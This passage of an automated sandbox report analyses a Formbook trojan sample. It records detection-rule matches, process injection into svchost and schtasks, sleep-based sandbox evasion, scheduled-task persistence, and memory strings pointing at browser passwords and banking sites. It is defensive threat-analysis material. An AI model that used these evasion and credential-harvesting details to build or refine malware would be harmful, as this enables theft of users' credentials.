            Source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeFile created: C:\Users\user\AppData\Local\Temp\outvauntsJump to behavior
            Source: Doc 784-01965670.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: schtasks.exe, 00000004.00000002.4508662469.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000810000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2400687700.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2400783650.00000000007E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Doc 784-01965670.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeFile read: C:\Users\user\Desktop\Doc 784-01965670.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Doc 784-01965670.exe "C:\Users\user\Desktop\Doc 784-01965670.exe"
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Doc 784-01965670.exe"
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Doc 784-01965670.exe"Jump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Doc 784-01965670.exeStatic file information: File size 1321247 > 1048576
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.2188818798.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2188967652.000000000345A000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.0000000000924000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jEsBIhfnof.exe, 00000003.00000002.4509238213.0000000000C2E000.00000002.00000001.01000000.00000004.sdmp, jEsBIhfnof.exe, 00000006.00000000.2290300485.0000000000C2E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Doc 784-01965670.exe, 00000000.00000003.2051685242.0000000004620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130236373.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131854715.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2223204393.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2224989502.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.000000000304E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Doc 784-01965670.exe, 00000000.00000003.2051685242.0000000004620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2130236373.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131854715.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000003.2223204393.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2224989502.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.000000000304E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4510450854.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2509345091.000000003CE2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.2188818798.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2188967652.000000000345A000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.0000000000924000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4510450854.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2509345091.000000003CE2C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: Doc 784-01965670.exeStatic PE information: real checksum: 0xa2135 should be: 0x144463
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401803 push ds; iretd 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416033 pushfd ; ret 2_2_0041609B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408199 pushad ; ret 2_2_004081C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415AF3 push eax; ret 2_2_00415B63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041CAFD push ss; retf 2_2_0041CB05
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417AAE push FFFFFFD9h; ret 2_2_00417AB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013E0 push ds; iretd 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413BEE push 0000003Ah; ret 2_2_00413C42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CB98 push 7D3987A0h; iretd 2_2_0040CB9D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413C43 push 0000003Ah; ret 2_2_00413C42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E420 push ecx; iretd 2_2_0041E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413C8A push ecx; iretd 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D28 push edx; ret 2_2_00413D64
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D28 push ecx; iretd 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413DB0 push ecx; iretd 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040668E push esi; retf 2_2_00406692
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402EA0 push eax; ret 2_2_00402EA2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EEAC push es; ret 2_2_0041EEBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413F34 push eax; retf 2_2_00413FB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401786 push ds; iretd 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413FA5 push eax; retf 2_2_00413FB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0225F pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B027FA pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0283D push eax; iretd 2_2_03B02858
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EB225F pushad ; ret 4_2_02EB27F9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EB27FA pushad ; ret 4_2_02EB27F9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EB283D push eax; iretd 4_2_02EB2858
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EE09AD push ecx; mov dword ptr [esp], ecx4_2_02EE09B6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EB1368 push eax; iretd 4_2_02EB1369

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004440780_2_00444078
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeAPI/Special instruction interceptor: Address: 3F95264
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\schtasks.exeWindow / User API: threadDelayed 9694Jump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-86310
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-84957
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeAPI coverage: 3.0 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\schtasks.exeAPI coverage: 2.4 %
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 432Thread sleep count: 278 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 432Thread sleep time: -556000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 432Thread sleep count: 9694 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 432Thread sleep time: -19388000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052Thread sleep time: -95000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052Thread sleep time: -55500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052Thread sleep count: 48 > 30Jump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0045C310 FindFirstFileW,FindNextFileW,FindClose,4_2_0045C310
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: 6222f67M.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 6222f67M.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 6222f67M.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: firefox.exe, 00000007.00000002.2511342240.000001843CD9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
